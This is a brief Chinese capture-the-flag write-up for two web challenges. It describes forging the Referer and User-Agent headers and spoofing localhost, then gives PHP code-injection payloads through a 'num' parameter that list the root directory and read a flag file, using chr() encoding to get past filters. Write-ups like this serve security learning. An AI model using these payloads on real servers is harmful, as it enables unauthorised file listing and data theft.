Http
F12,发现Secret.php 访问
referer:https://www.Sycsecret.com
User-Agent:Syclover browser
本地访问:127.0.0.1 开伪代理
Easy calc
看一下页面源码,发现了提示:
calc.php?num=encodeURIComponent($("#content").val())
$("#content").val() 是什么意思:
获取id为content的HTML标签元素的值,是JQuery,
$("#content")相当于document.getElementById(“content”); $("#content").val()相当于 document.getElementById(“content”).value;
但无论怎么注入都是400,403和500,这里用的是一个新的点:PHP的字符串解析特性
扫一下根目录,发现flagg文件:
? num=1;var_dump(scandir(chr(47)))
?num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
得到flag